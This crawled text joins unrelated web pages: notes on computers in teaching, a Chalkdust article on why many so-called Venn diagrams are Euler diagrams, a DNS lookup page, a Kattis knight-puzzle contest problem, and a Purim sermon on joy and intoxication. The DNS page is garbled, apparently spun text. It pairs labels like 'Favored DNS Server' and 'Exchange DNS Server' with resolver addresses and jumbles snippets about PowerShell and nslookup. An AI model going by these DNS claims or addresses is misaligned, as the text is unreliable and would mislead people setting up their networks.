* The Technology of the Blackboard and The Technology of The Computer
* Lines You can use:
The computer to program the student…
The student to program the computer…
Computer as an expensive set of flash cards.
If the students scores improve, our approach must be right.
Self-directed activities versus carefully guided ones
If the scores improve does it mean that the strategy is effective/
approach is right?
Heterarchical versus Hierarchical
Totalitarian Education or Trivialized Education | <urn:uuid:1d669837-8c25-41b7-9a94-0728b02f6906> | CC-MAIN-2023-14 | https://damitr.org/category/xo/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949355.52/warc/CC-MAIN-20230330163823-20230330193823-00601.warc.gz | en | 0.951936 | 4,521 | 2.953125 | 3 |
More often than I care to admit, I find myself sitting in the audience of a maths lecture or seminar completely and utterly lost as to what the speaker is going on about. What are they talking about? How does this relate to stuff I know about? Where does this fit within the sphere of mathematics as a whole? In fact, most of the time I am lost beyond the first slide of a presentation. In an endeavour to minimise the possibility that audience members would experience this feeling that I know all too well, I recently introduced myself at the start of a talk with this slide:
You could be forgiven for remarking “My, what a beautiful Venn diagram you have there!” Indeed, I too was under the impression that what I had created was in fact a Venn diagram.
You almost certainly will have come across Venn diagrams before. Though in case you have not, allow me to briefly introduce them. Venn diagrams are widely-used visual representation tools that show logical relationships between sets. Popularised by John Venn in the 1880s, they illustrate simple relations between sets, and are nowadays used across a multitude of scenarios and contexts. And no one can be blamed for their wide usage—they truly are things of beauty. But who was John Venn? And how did he come to create such an iconic tool that’s used so broadly today?John Venn (1834–1923) was an English mathematician, logician and philosopher during the Victorian era. In 1866, he published The Logic of Chance, a groundbreaking book which advocated the frequency theory of probability—the theory that probability should be determined by how often something is forecast to occur, as opposed to ‘educated’ assumptions.
The Victorian era in general saw significant shifts in the way that science and experimental measurements were thought about. It was at this point in history that science began to shift towards a new paradigm of statistical models, rather than exact descriptions of reality. Previously, scientists had believed that mathematical formulas could be used to describe reality exactly. But nowadays, we talk about probabilities and distributions of values, and not about certainties. We now interpret individual experimental measurements knowing that, no matter how precise or controlled an experiment is, some degree of randomness always exists. Using statistical models of distributions is what enables us to describe the mathematical nature of that randomness.
But I digress—back to Venn diagrams. When Venn actually first created his namesake diagrams, he referred to them as Eulerian circles, after everyone’s favourite Swiss mathematician Leonard Euler, who created similar diagrams in the 1700s. And this is where, I regret to inform you, the thing is—and I’m very sorry to be the one to tell you—that Venn diagram up there? Not actually a Venn diagram.
By definition, in a Venn diagram, the curves of all the sets shown must overlap in every possible way, showing all possible relations between the sets, regardless of whether or not the intersection of the sets is empty: $\emptyset$. Venn diagrams are actually a special case of a larger group of visual representations of sets: Euler diagrams. Euler diagrams are like Venn diagrams, except they do not necessarily show all relations.
When thinking about Venn diagrams, we normally picture something like my beautiful introductory slide above, right? Namely, there are circles, and they overlap. The interior of each of the circles represents all of the elements of that set, while the exterior represents things that are not in that set. For example, in a two-set Venn diagram, one circle may represent the group of all Chalkdust readers, while the other circle may represent the set of tea drinkers. The overlapping region, or intersection, would then represent the set of all Chalkdust readers that drink tea (a verifiably non-empty set). It is common for the size of the circles to represent relative size of the set that circle is representing (eg one’s undergraduate maths education being much (much) smaller compared with the sphere of mathematics as a whole).
We also commonly see nested Venn diagrams, where one set is completely situated within another set (again, one’s undergraduate maths education being entirely nested in the realm of mathematics as a whole [though this is debatable—I’ll save this for the next Chalkdust article]). But in a traditional, true-to-definition Venn diagram, every single possible combination of intersections of the sets must be visually displayed…
(While we cannot verify whether or not there exist cats that are also Chalkdust readers and/or tea drinkers, the Venn diagram insists we show all possible intersections.)
It is actually mathematically impossible to draw a Venn diagram exclusively with circles for more than three sets. If we add a fourth set below, no matter how you move the four circles around, you can never find a region that isolates only the intersection of diagonally opposite sets—cats and tea drinkers (or Chalkdust readers and accordion players). Formal mathematical proof is LeFt aS An eXeRcIsE fOr ThE rEaDeR.
As you can see then on the right, for high numbers of sets (‘high numbers’ $=$ greater than three), unfortunately some loss of symmetry in the diagrams is unavoidable. John Venn experimented with ellipses for the four-set case in an attempt to cling onto some diagrammatic elegance and symmetry. He also devised Venn’s constructions which gave a construction for Venn diagrams for any number of sets. These constructions started with the three-set circular Venn diagram and added arc-like shapes which weaved between each of the previous sets to create every possible logical intersection. These constructions quickly become quite dizzying (see the loopiness of Venn’s construction for six sets):
So what can we do if we don’t want to weave back and forth so dizzyingly for higher numbers of sets? Enter: Edwards–Venn diagrams. Anthony William Fairbank Edwards (1935–) constructed a series of Venn diagrams for higher numbers of sets. He did this by segmenting the surface of a sphere.
For example—as you can see on the right—three sets can be easily represented by taking three hemispheres of the sphere at right angles ($x = 0$, $y = 0$ and $z = 0$). He then added a fourth set to the representation, by taking a curve similar to the seam on a tennis ball, which winds up and down around the equator, and so on.
The resulting sets can then be projected back to a plane, to give cogwheel diagrams, with increasing numbers of teeth for more and more sets represented:
So finally, to conclude this article, I present to you my new and improved introductory (actually-a-Venn) diagram:
While I appreciate the poetic implication that the realms of my respective research groups (fluid dynamics and behavioural genomics) weave in and out of my PhD project, which is nested neatly in the centre, in reality the fact is that many many of these intersections are quite empty.
Please consider this article in support of my upcoming petition to make it mandatory for academics to introduce themselves at the start of every talk with a Venn (or Euler) diagram.
More from Chalkdust
The big argument: Is Matlab better than Python?Which do you prefer?
Significant figures: Gladys WestMadeleine Hall looks at one of the minds behind GPS
My favourite LaTeX packageThe Chalkdust editors share some of their favourites
That’s a MoiréDonovan Young interferes in wave patterns
Handbook of equationsForgotten how to draw a log graph? No need to panic – here's a handy guide!
In conversation with Dominique SleetEllen Jolley learns how to run a maths outreach programme | <urn:uuid:72482170-80cd-4086-b80d-2f0f0b7f6361> | CC-MAIN-2023-14 | https://chalkdustmagazine.com/features/on-the-cover-vhat-vhere-venn/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949533.16/warc/CC-MAIN-20230331020535-20230331050535-00202.warc.gz | en | 0.946868 | 1,647 | 3.25 | 3 |
DNS Lookup tool finds all DNS records of a given domain name. The records include but not limited to A, AAAA, CNAME, MX, NS, PTR, SRV, SOA, TXT, CAA. Enter a domain name and select record type to get a specific record or keep default to fetch all DNS records.
Jul 09, 2020 · The network settings for your computer, router, or access point allow you to specify which DNS servers—primary and secondary—to use. By default, these are likely set by your internet service provider , but there may be faster ones you can use. The next very popular DNS Service on our list is “Level3”. It is considered as the best after Google and Open DNS service provider. In order to use this level3 DNS server, one should configure their Domain Name System settings to the following IP addresses. Favored DNS Server: 220.127.116.11; Exchange DNS Server: 18.104.22.168 ABOUT DNS LOOKUP. This test will list DNS records for a domain in priority order. The DNS lookup is done directly against the domain's authoritative name server, so changes to DNS Records should show up instantly. By default, the DNS lookup tool will return an IP address if you give it a name (e.g. www.example.com) Jul 27, 2017 · Hi All, I'm having some fun with a power-shell script for setting the DNS settings of clients $dnsserver = (,"W.X.Y.Z") $Computer = Get-Content "c:\users\path\to\my.csv"
Gather DNS settings from remote servers using PowerShell This script is a continuation of the script in the “Performing Advanced Server Management” chapter in theWindows PowerShell 2.0 Bible., which itself was a modified version of a script I presented on my blog on May 12th, 2010: PowerShell WMI Gather DNS settings for all ServersThis
This command gets a DNS server configuration. Example 2: Get local DNS server configuration and then export it. PS C:\> Get-DnsServer | Export-Clixml -Path "c:\config\DnsServerConfig.xml" This command gets the DNS server configuration on the local server and passes it to the Export-Clixml cmdlet to be translated into an XML file. Parameters How (and Why) to Change Your DNS Server | PCMag May 17, 2019
Jun 18, 2020
Use Powershell or CMD to list DNS Servers in Domain. A sample way out is open CMD or Powershell and start the NSLOOKUP utilitiy. Next, In order to get the list of DNS Servers in domain, set the type to NS and finally, type your Root Domain Name and press Enter. Above list will list DNS Server in your domain. How to Fix DNS Server Not Responding Errors Jun 17, 2020 How to Double Your Internet Speed With One Settings Change Jul 09, 2020 | <urn:uuid:1da49682-1cda-49b9-8c41-eab11f41e88e> | CC-MAIN-2023-14 | https://goodvpnfeltgs.netlify.app/galinol6302vana/get-dns-settings-706.html | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949533.16/warc/CC-MAIN-20230331020535-20230331050535-00202.warc.gz | en | 0.8113 | 620 | 2.515625 | 3 |
Knights in Fen
There are black and white knights on a 5 by 5 chessboard. There are twelve of each color, and there is one square that is empty. At any time, a knight can move into an empty square as long as it moves like a knight in normal chess (what else did you expect?).
Given an initial position of the board, the question is: “what is the minimum number of moves in which we can reach the final position”, which is:
First line of the input file contains an integer $N$ ($N<14$) that indicates how many sets of inputs are there. The description of each set is given below:
Each set consists of five lines; each line represents one row of a chessboard. The positions occupied by white knights are marked by $0$ and the positions occupied by black knights are marked by $1$. The space corresponds to the empty square on board.
There is no blank line between the two sets of input.
The first set of the sample input below corresponds to this configuration:
For each set your task is to find the minimum number of moves leading from the starting input configuration to the final one. If that number is bigger than $10$, then output one line stating
Unsolvable in less than 11 move(s).
otherwise output one line stating
Solvable in $n$ move(s).
where $n \leq 10$.
The output for each set is produced in a single line as shown in the sample output.
|Sample Input 1||Sample Output 1|
2 01011 110 1 01110 01010 00100 10110 01 11 10111 01001 00000
Unsolvable in less than 11 move(s). Solvable in 7 move(s). | <urn:uuid:f341288c-d430-4879-9785-08f2c7b04ba6> | CC-MAIN-2023-14 | https://open.kattis.com/contests/ma2nhe/problems/knightsfen | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945472.93/warc/CC-MAIN-20230326111045-20230326141045-00202.warc.gz | en | 0.911431 | 383 | 3.4375 | 3 |
Rav Itamar Shwarz, the author of the Bilvavi Mishkan Evneh.
Download a number of Drashos on Purim
Download the Drasha on Purim posted here
The First Simcha Was Between Adam and Chava In Gan Eden
The month of Adar, as is well-known, contains the special power of simcha (happiness). The happiness already starts from the beginning of the month – “When Adar enters, we increase our happiness” – and it continues until it reaches its climax, on Purim. The joy of Purim is described in many verses in Megillas Esther: “And the city of Shushan was joyous and glad”; as well as in the verse, “To the Jews, there was light, gladness, joy, and honor.” There was “happiness and gladness to the Jews, festivity and a day of celebration.”
Let us delve into the root understanding behind the joy of Purim, so that we can arrive at true happiness in our souls, with the help of Hashem.
Where do we find the first mention of simcha in the Torah? Who was the first person to rejoice? When we bless the chosson and kallah during Sheva Berachos, one of the blessings is: “Rejoice, beloved friends, as your Creator gladdened you in Gan Eden of old.” We are blessing the chosson and kallah that just as Hashem rejoiced Adam and Chava in Gan Eden, so should the chosson and kallah reach this level of simcha. The first simcha mentioned in the Torah was Adam and Chavah as they rejoiced in Gan Eden, and Hashem Himself, in all His honor and glory, was the One who gladdened them.
Different Expressions of Simcha
The Sages list ten different expressions of happiness: sasson, simcha, gilah, rinah, ditzah, tzahalah, alizah, chedvah, tiferes, and alitzah. Six of these are mentioned in the blessings we give to the chosson and kallah: sasson, simcha, gilah, rinah, ditzah and chedvah.
We have already explained earlier about the different joys of sasson and simcha. Now we will reflect on the other four expressions which we bless the chosson and kallah with: gilah, rinah, ditzah, and chedvah.
The words rinah and ditzah contain the letters yud and hey, which spells a name of Hashem, while the word chedvah has the letters vuv and hey.
Let us try to understand the difference between these different expressions of simcha.
The word for “man” is Hebrew is ish, while woman is ishah. The word ish contains the letter yud and hey, while the word ishah contains the letters aleph, shin and hey, which spells the words “aish Hashem”, the “fire of Hashem.” When man and woman are unified through marriage, the happiness of gilah, rinah and ditzah are created. The letter yud of ish\man and the letter hey of the ishah\woman come together and form these three kinds of happiness – gilah, rinah, and ditzah, which all contain both the letters yud and hey.
If we reflect into the words of Megillas Esther, we see that the joy of the Purim miracle was actually brought about by Haman’s plan to annihilate the Jewish people. Haman was the descendant of Amalek – whom the Jewish people have endured much suffering from. The Sages said that from the time Amalek attacked the Jewish people, the Name of Hashem is incomplete; the letters yud and hey have been split apart from the other two letters, vov and hey, in Hashem’s Name – ever since Amalek attacked. The Name of Hashem will be incomplete until Amalek is erased.
As long as Amalek exists, our simchos (happy celebrations) are never complete – although it appears that we are making simchos. Some simchos are like chedvah, and some simchos are like gilah, rinah and ditzah [but each of these is incomplete, for they each represent only half of Hashem’s Name].
In order to see how the joys of gilah, rinah and ditzah differ from chedvah, we need to see the contrast between these different kinds of happiness.
Chedva – Joy Based On Unifying With Others
The word of “one” in Hebrew is echad, and in Aramaic, “one” is “chad.” In the Aramaic version, the letter aleph is taken away from the word echad, which spells “chad”. The first two letters of the word chedvah – the letters ches and daled – are related to the word yachad, “together”, which connotes unity. When we add on the last two letters of the word chedvah – the letters vov and hey – we have essentially unified the letters vov and hey. Chedva is thus a concept of unifying that which was used to be apart; Chedva takes two separate parts and unifies them into one.
It is thus fitting that chedvah should be one of the expressions of joy found in the blessing given to the chosson and kallah, because man and woman, who were previously separated, are now being united through marriage.
We also find a usage of the term chedva by Yisro, who rejoiced when he heard about all the miracles of the Jewish people, and he was thus drawn to the Torah; it is written, “Vayichad Yisro”, “And Yisro rejoiced” – “Vayichad”, from the word “chedvah.”
This is the joy of Chedvah – when one succeeds in unifying with something that used to be apart from him. Unity causes joy, and there is thus joy between newlyweds, for the single man and woman used to be apart, and now they have unified.
Gilah, Rinah and Ditzah – Joy Based On Unity Within
But the other kinds of happiness – Gilah, Rinah and Ditzah – are a different concept than Chedvah. These are kinds of joy that one attains when he connects to his own self.
Most people are not always happy. Why?
It because most of us are in a situation of “half a body” – we are split apart inside our own self, and this is due to our many doubts that plague us; our doubts give us no rest, and this makes us disconnected from our own inner self.
Our sefarim hakedoshim state, “There is no happiness like the clarification of doubts.” When a person succeeds in removing his doubts, he attains somewhat of a connection to his inner self, and he feels a certain joyous satisfaction from this. These are the joys of gilah, rinah and ditzah.
We have thus seen two kinds of happiness: joy upon connecting with others – such as marriage between man and woman – and the joy of connecting to oneself.
Joy From The Outside Is Superficial
The joy of chedvah is thus when we unify with something that was apart from us, while the joys of gilah, rinah and ditzah are when we attain unity within our own soul.
Let us reflect: Is most of our happiness coming from within ourselves, or is it coming from something outside of ourselves? Upon a little thinking, we will discover that most of our happiness is coming from externalities, such as: buying a new house, buying a new car, buying a new suit, getting married. Most of our simcha is coming to us when we “get” something from the outside. For this reason, most of our happiness is not complete, because as long as out happiness is coming from something external, it is only temporary. The happiness we are often experiencing is often temporary; the things that are making us happy come and go.
How can we reach complete happiness? It can be reached if we succeed in unifying the parts of our soul together; this will cause us to have an inner joy, and it will lead us to attaining a complete kind of happiness.
Most of us have disparity in our soul; we are constantly full of desires that contradict each other. A person has many things he would like to do each day, and the day simply isn’t long enough to fulfill of these desires. He is left with no choice but to prioritize what he wants the most and give up pursuing some of his desires. We are all full of many retzonos (desires), and these retzonos are all contradicting each other! We are sensible people who possess daas (mature thinking) and therefore we are able to choose what our priorities are. But we are still left with many contradicting desires within us, and this prevents us from attaining any complete happiness.
“When Wine Enters, Secrets Come Out”
If a person succeeds in attaining his inner happiness, he reveals a whole new depth to his soul, as we are about to explain. The words of the Sages are well-known: “When wine enters, secrets come out.” Wine bears a connection with revealing our innermost secrets. It is also written, “Wine gladdens the heart of man.” Wine bears a connection with happiness. Wine reveals our secrets, and this somehow brings out our happiness. What is the connection between our secrets and our happiness?
We first need to reflect into what this means. When the Sages said that wine reveals secrets, what kind of secrets were they referring to? Were they referring to us a secret that our mother told us when we were children, which we never told anyone before, and then on Purim we get intoxicated and then reveal those secrets…? Any sensible person knows that such secrets have nothing to do with the wine of Purim. So what kind of secrets were Chazal talking about, that wine can come and reveal?
Chazal were telling us that wine reveals our innermost secrets. They were revealing to us that through wine, we can reveal our innermost secrets – the depths of our soul.
What is a secret? If Reuven tells a secret to Shimon and he tells him not to tell anyone, even this isn’t considered a total secret. Theoretically, Reuven can give permission to Shimon to reveal the secret, so the secret isn’t considered to be a total secret.
If someone is sitting in his house and daydreaming, nobody else knows what he is thinking. But is that called a secret? If it is, then the whole world is full of secrets…! So this can’t either be the meaning of “secret.”
What is a true kind of secret? A true secret is something that is concealed from a person. A secret is when a person isn’t aware of himself, when he’s not aware of what’s going on deep down inside himself. This is a secret, because the person is living with himself all the time and he thinks that he knows himself, while he really doesn’t know himself at all. That’s a secret.
Is there any person who can say that he understands what is going on in the depths of his heart?! Anyone who thinks that he knows himself well is someone who really doesn’t know himself at all! Anyone who has a little bit of self-awareness is well-aware that the soul is full of so much depth, layer within layer – and that more depth to our soul is being revealed with the more and more we live our life. Nobody can say that he really knows what’s going on deep down inside himself.
“When wine enters, secrets come out” means that wine can reveal an additional depth to a person about his own soul – things that he was previously unaware of.
The Secrets Which the Wine Reveals
We can now reach a new understanding in this statement of Chazal, “When wine enters, secrets come out.” From where are our secrets coming out from? A superficial understanding is that our secrets are coming out of our mouth; that when a person gets intoxicated, secrets come forth from his mouth. It’s clear to all that this is not what Chazal mean. According to what we explained above, wine can get our consciousness (in Hebrew, hakarah or muda) to become aware of what’s going on in our sub-conscious (in Hebrew, tat-hakarah or tat-muda). Wine can serve to reveal our innermost depths of the soul – depths which we had been previously been unaware of.
“When wine enters, secrets come out.” Our subconscious desires, which used to be a secret to us, can be revealed to us through the wine, and thus, the wine reveals to our “secrets.” When our soul becomes revealed to us, this causes us to have an inner happiness.
This is a kind of happiness which is totally different that the regular kind of happiness we are familiar with, which is when we get new things. It is a happiness that takes place internally, and it is called the joy of chedvah: when our soul unifies with itself.
What takes place when our soul becomes unified within ourselves? Let us reflect about this.
When a person has doubts, these doubts are found within a certain layer of his soul. How can a person solve his doubts? The superficial way to solve doubts is to calmly weigh the options and then decide what to do. If a person can’t decide alone, he’ll ask someone else for advice.
But there is an inner method a person can use to solve his doubts, and that is when a person reveals a greater depth to his soul. The doubts are then removed automatically. This is the meaning behind how “Wine enters, secrets come out.” The whole reason why we can ever have a doubt is because a certain layer of our soul was hidden from us. Through drinking the wine on Purim, we can reveal a deeper layer in our soul which we previously were unaware of – and this removes the source of the doubt.
Understandably, this does not mean that wine creates new depth to our soul. The wine isn’t creating anything in us. It is just that through drinking the wine, the resulting intoxication can make us become aware of the more hidden parts of our soul – and this in turn reveals to us new depth about ourselves.
As a simple example, let’s say a person is beginning to learn Torah, and he’s not sure about which area in Torah he should learn. He narrows it down to two options, but he can’t decide. Later on in his life he can gain more understanding about himself, and then he will discover that one of the options isn’t the path that is meant for his soul to take.
Another example: as long as a person doesn’t know himself well – the nature of his personality – if he’s looking for a certain job, he’s not sure about what kind of job will work for him. When he gets to know himself better, the doubts become non-existent.
There is a huge difference between these two different solutions to our doubts. The first method is superficial, because when a person decides between two options, he can still be bothered by the second option; it is just that he has decided to go with the first option. But with the deeper method – which is when a person discovers new depth to his soul, through attaining greater self-awareness – he has no doubt whatsoever. He sees clearly what the truth is, and he feels inner happiness at this. “There is no happiness like the clarification of doubts.”
The Conscious and The Sub-Conscious
Now that we have explained that wine serves to reveal the innermost depths of the soul to a person, we need to understand: How does this work? How exactly does wine reveal to us what’s going on in our soul?
As is well-known, we all have in us abilities that are revealed to us, and we also have abilities which we aren’t yet aware of. In more modern language, we have in us a conscious and a sub-conscious. Our Rabbis knew about this before modern psychology discovered this. Reb Yisrael Salanter described our consciousness as our revealed abilities (“kochos giluyim”), while our subconscious is described as our unrevealed abilities (“kochos keihim”).
What is our subconscious – our unrevealed abilities?
Reb Yisrael Salanter gave us an example which illustrates the concept. Once there was a Rosh Yeshiva who had a son and a student, and to his great pain, his son went astray from being religious. The student, however, remained powerfully connected to his beloved teacher, and was utterly loyal to him. As time went on, the father grew more attached in love with his student than with his son, while he grew more and more estranged from his son, to the point of hatred.
Then, in middle of the night, a fire suddenly broke out in the building where both his son and student slept. The father is woken up in middle of the night and he is told that he only has enough to save one of them: either his beloved student – or his rebellious son, who has caused him so much grief. Which one of them will he save?
Reb Yisrael Salanter answered: He will instinctively run to save his son! All of his anger toward his son gets pushed aside, now that he has to choose between his son and his student. Now, if he would have had time to think about this, he would choose to save his student, who is more precious to him than his son. But when he gets woken up in the middle of the night and there is no time to think, he’s acting upon his subconscious. What’s going on in his subconscious? Deep down, he loves his son more than the student; it has just been pushed under all this time. When push comes to shove, the inner love for his son gets awakened, and it overpowers the love he has for his student.
Once a student of Rav Dessler zt”l came to him and told him that he had a nightmare: he had a dream in which he killed his son. He was terrified at the meaning of the dream and asked how was it possible that he could have such thoughts in his head, when he loved his son very much; did it mean that he really wanted to kill his son?! Rav Dessler told him, “Sometimes, you son cries at night and wakes you up at night. For a few seconds, you are so annoyed at him at waking you up, that you wish he wouldn’t exist. That is why you were able to have such a nightmare.”
Would the father ever consciously wish he could kill his son? Chas v’shalom; of course not. But in a dream, a person is shown what’s going on in his subconscious, and he is shown that he has such quickly passing thoughts.
How can a person discover what’s going on in his subconscious? It is written, “On my bed at nights, I sought that which my soul loved.” If a person wants to find out what he truly desires deep down in his soul, it is revealed to him “on my bed at nights” – when he’s asleep and dreaming. Sometimes a person is shown his subconscious when he’s partially asleep, when he’s still a bit conscious; and sometimes he is shown his subconscious when he’s totally asleep, which is when he’s dreaming.
Bringing Our Sub-Conscious Into Our Conscious
It is now upon us to think into the following.
If a person is having negative kinds of thoughts that are passing through his quickly throughout the day – subconsciously – what can he do about this? Most people aren’t bothered by these negative thoughts. When people get these strange thoughts, they quickly push them aside, and they do not try to figure out what factor triggered those thoughts.
But when a person wants to understand himself well, he is bothered by negative thoughts even if they pass by in his mind very quickly. He begins to learn about what his thoughts are, and he realizes that his thoughts are showing him what’s going on in his subconscious.
The solution is not to try and push aside the unwanted thoughts; to the contrary, let the thoughts stay, so you can see what’s going in your subconscious [unless they are forbidden thoughts]. After this comes the next step: a person should not be focused on the actual thoughts themselves, but on the information that the thoughts are revealing.
If a person only tries to work on awareness of his thoughts, he will attempt to push aside his negative thoughts, and he won’t be able to truly grow and better himself. He’s running away from the root of the problem. The problem is not his negative thoughts; the negative thoughts he’s experiencing are merely branches of the problem. The root of the problem is the sub-conscious in himself which hasn’t yet been purified. So just dismissing the thoughts will not really be solving the problem at its root, but rather avoiding the problem.
The real solution is not to push aside the negative thoughts, but rather, to let them be. See what they are revealing. This will be a double gain. First of all, one will be able to realize what his weaknesses are, and this will help him more self-aware to fix them. Secondly, he will able to notice his qualities which he was previously unaware of, and thus come to utilize his potential.
The Way To Recognize Your Subconscious Thoughts
Our subconscious is contained in every one of our souls, but they aren’t accessed simply through our mind. The thoughts coming from our subconscious come to us in quick flashes, like lightning. Lightning comes where it’s dark and cloudy, and then it is gone in a flash; it’s gone as quickly as it came, just as it’s impossible to calculate the exact moment that lightning strikes.
This can give us some idea about the thoughts contained in our subconscious. These inner thoughts are termed in the sefarim hakedoshim as “birds that fly in the sky”; they pass quickly, flying away very fast, like birds. They pass in our head so quickly that often we are unaware of them at all. But the more a person elevates himself spiritually, the more he enters inward, the more he can become aware of his deeds, words and his thoughts.
The way to become aware of our thoughts is by listening within ourselves, which is a subtle kind of listening. When we notice the suddenly passing thoughts, we can then better recognize what’s going on in our subconscious.
Our subconscious cannot be reached through trying to think about it; we cannot reach our subconscious, which is hidden, through our conscious mind, which is revealed to us. If we try to reach our subconscious through our conscious mind, this is like trying to water a plant from the top of the earth, without taking care of the roots underneath.
Revealing Our Subconscious – Through Getting Intoxicated On Purim
There is another way to reveal our subconscious [besides for noticing our quickly passing thoughts], and that is through drinking the wine on Purim and thereby becoming intoxicated [in the proper way, as we will soon explain].
The Hebrew words shechor (blackness) and sheichar (intoxicating beverage) have the same root letters; they both contains the letters ches and chof. This hints to us that the nighttime, which is blackness, reveals to us the same things which intoxication can reveal to us.
The Sages explain that the word “Achashveirosh” contains the same letters of the word shechor (black), because he “blackened” the eyes of the Jewish people with his decrees. To counter his darkness which he brought upon the Jewish people, we intoxicate ourselves with the holy kind of darkness – the sheichar, the intoxicating beverages.
This is the purpose of getting intoxicated on Purim: by getting intoxicated, we are able to become aware of what’s going on in the depths of our soul.
How Much Should We Drink On Purim?
In the words of our holy Rabbis, there are differing opinions concerning how intoxicated one should become on Purim. The halachah is that “One is obligated to become intoxicated on Purim until he does not know the difference between Blessed is Mordechai and Cursed Is Haman”; one of the Rabbis wrote that it was revealed to him in a dream that one has to get intoxicated only until that point, but not beyond that. In other words, one should drink on Purim more than he usually does (which is the view of the Rema), but he should not get to the point in which he is so drunk that he doesn’t know the difference between Mordechai and Haman.
There is a differing opinion of our Rabbis, which is to get drunk in the simple sense – that one should get so drunk to the point where he does not know the difference between Mordechai and Haman.
This is the argument, but for every argument of our Sages, there is always a rule that “Their words, and their words, are the words of the living G-d.” Therefore, both opinions are correct; let us understand how they both can be true.
As is well-known, most people get to know themselves a lot better when they become intoxicated. The truth is that the whole intention of why we should get intoxicated on Purim is for this very reason: to reveal our inner essence – our pure soul. Since most people are not in touch with their pure essence, we are commanded to intoxicate ourselves on Purim so that our inner purity can burst forth.
The more a person works to purify himself inwardly, the more his intoxication is coming from deep within. Of him, the mitzvah to become intoxicated on Purim is to get to the point of ad d’lo yoda, in which he does not know the difference between Mordechai and Haman – for the whole purpose is to reveal outward the beauty and purity of his soul hidden deep within him.
But if a person hasn’t worked to purify himself internally, then when he gets intoxicated, much of the garbage that has piled up inside him throughout the year will come pouring out. We often see people on Purim who are rolling around in the street in their drunkenness, spewing forth all their inner emptiness. Of these kinds of people, getting drunk on Purim should only have been until ad d’lo yoda, but not beyond that point; they have should gotten only up until the point of ad d’lo yoda, and they should not have gone beyond that.
How can a person know if he should only get intoxicated until the point of ad d’lo yoda, but not beyond that – or if he is meant to go beyond lo yoda?
The way to know this is hinted to in the concept we brought before: that shechor\blackness and sheichar\intoxication have the same root. Most people, if they would be walking alone at night, in a forest, would be very scared. Darkness, shechor, is a power in Creation that causes us to have fear. Since shechor is reflected in sheichar\intoxication, this kind of person, when he gets intoxicated, will reveal forth the level he’s really on if he were to walk alone through a forest at night…
There are a few exceptional individuals of whom it can be applied the possuk, “To tell over in the morning of Your kindness, and of Your faith at nights.” When someone walks alone through a forest at night, and he still has emunah – he is the kind of person who can become completely intoxicated on Purim yet elevate himself through it. His intoxication will only serve to reveal forth his inner essence, which has become purified through emunah – for he completely trusts in Hashem.
Thus, becoming intoxicated reveals what’s going in the depths of each person’s soul. If someone has worked to purify his soul, getting intoxicated will revealed forth the beauty and holiness of his soul. Such a person reaches the intended purpose of Chazal when they enacted that we should become drunk on Purim.
Most people, however, do not reach the intended purpose of getting intoxicated on Purim. When they get drunk, the worst in them is brought out. Getting drunk thus causes most people to lower their self-image in the eyes of others. This resembles a person who places a big sign on himself that advertises all his worst shortcomings, and then he walks all over town with it.
Each person needs to figure out if it’s worth it for him to get drunk on Purim. A person has to ask himself: “If I get drunk on Purim, will I behave in the way that Chazal intended me to?”
If a person knows himself well and he knows that he has worked more to purify himself internally during the year, then he is able to fulfill ad d’lo yoda on Purim. But if a person knows that he will come to improper behavior when he gets to the point of ad d’lo yoda, then he must know that for him, getting on Purim totally defeats the purpose of Purim.
The Purpose of Getting Drunk On Purim
Now that we have clarified who should be getting drunk on Purim, we can now explain what indeed we are trying to gain from getting drunk on Purim.
When a person has worked to purify himself internally, there is still more depth to himself that he doesn’t know about. When he gets intoxicated, he can discover new depth to himself which he never knew about until now.
Chazal said that “When wine enters, secrets come out.” To the degree that one has revealed his soul, greater secrets will be revealed from within, through the wine on Purim. Thus, to someone who has purified himself internally, getting intoxicated through the wine of Purim will bring him a kind of joy that is inner and G-dly. The wine of Purim, for such a person, acts to reveal forth his inner purity, which he was previously unaware of. The wine of Purim allows such a person to identify with greater and deeper spiritual attainments that he didn’t reach until now. Of this we can apply the possuk, “Wine gladdens the heart of man.”There is no greater happiness than this, and only an internal kind of person merits it.
When the wine on Purim serves to achieve this holy goal – revealing to greater depths to the person about his pure soul – after Purim, the person will feel that he has been elevated spiritually. The ensuing inner happiness he will feel after Purim will burst out of him.
But most people have not worked to purify themselves inwardly. One might look like a very happy person on Purim to those who observe him, but this is only because wine temporarily puts a person into a good mood. We can see clearly that people start out happy on Purim when they’re drunk, but then they become depressed; a sort of melancholy comes upon them from getting drunk. There are a very large amount of people on Purim who cry bitterly when they’re drunk.
Where is this sadness coming from? It is really coming from the bitter truth that is being revealed to the person on Purim: he has not yet purified himself internally, and the wine reveals forth all of his deep sadness. He is terribly and profoundly sad deep down, and all of this comes out when he’s drunk. He will become sad from this revelation, and so of course, he cries.
Chazal say, “One who sees a sotah in her ruination should abstain himself from wine.” The deep explanation of this matter is that from the case of sotah, we can see how low a level a person can sink to when he’s drunk [and to take a lesson from this, one should avoid getting drunk].
Facing Our Fears
According to the above, we can now understand well what the connection that getting drunk on Purim has with the Purim miracle.
When a person is going through a distressful time, how does he react? One kind of person will fall into despair and completely lose hope. As it is written in the Megillah, “K’asher avadti, avadti” – “For I am surely lost.” But an internal kind of person, when he goes through a time of distress, uses it as an opportunity to summon forth inner strengths which he never knew about before.
If we ask anyone who persevered through an intensely troublesome time in their life: “Did you think you had the strength to survive such an ordeal, before you went through this?” they will often answer in the negative. They were unaware that they possessed such stamina to undergo the hardships they went thought, but really, they had the strength all along. It was just hidden deep within. When a person goes through a tzarah (a time of distress), he is able to reveal forth his hidden strengths of his soul, which he never knew he possessed.
Every person should reflect and think into the following. If you would know for sure that in two weeks, a decree would go out in your country that all Jews should become annihilated – just as in the times of Haman, who decrees genocide upon the Jewish people – how would we react? Understandably, there would be people who would right away fall into despair, and their first reaction would be to flee to another country. Their reaction would resemble how the Jews in the desert wished to return to the Egypt…
But an internal kind of person would face the fear in the right way. He would be able to summon forth new fortification from within himself that he was previously unaware of, and instead of having thoughts of running away from the danger, he would “run away” into a place in his own soul in which no one can harm him. Instead of falling into despair from the danger, he becomes elevated from the situation, revealing forth from within himself great spiritual stamina.
This was what the Jewish people revealed on Purim. Haman decreed that all Jews be annihilated, and Achashveirosh, who was the most powerful king in the world then, was ready to carry it out. According to nature, he should have succeeded. It was a situation of utter and palpable fear; each person felt it totally.
